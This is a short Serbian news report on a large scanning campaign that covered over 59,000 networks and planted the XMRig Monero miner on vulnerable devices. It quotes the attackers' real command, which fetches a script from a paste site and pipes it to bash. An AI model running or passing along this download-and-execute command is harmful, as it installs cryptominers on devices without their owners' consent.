Prema bezbednosnim istraživačima iz agencije Bad Pockets „veliko skeniranje“ je počelo 23. novembra, te služi za detektovanje propusta koji omogućavaju implementaciju malicioznog koda. Ovaj tip aktivnosti je, tvrde eksperti, prilično uobičajen, ali je ova kampanja jedinstvena zbog masovnosti pretrage. Procenjuje se da je kampanja obuhvatila preko 59 hiljada IP mreža, da bi se, kada se ranjivost detektuje, na uređaje otpremao kod chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash, koji potom dalje preuzima skripte sa servera napadača, te na kraju instalira bot-a za rudarenje kriptovaluta – Monero miner XMRig
https://twitter.com/bad_packets/status/1199087675833085959
Od kada je kampanja počela napadači su izrudarili tek 14,8 Monero jedinica, što je oko 740 dolara, ali bi suma mogla da se značajno uveća, budući da se radi o ogromnoj kampanji.
Izvor: TNW/PCPress
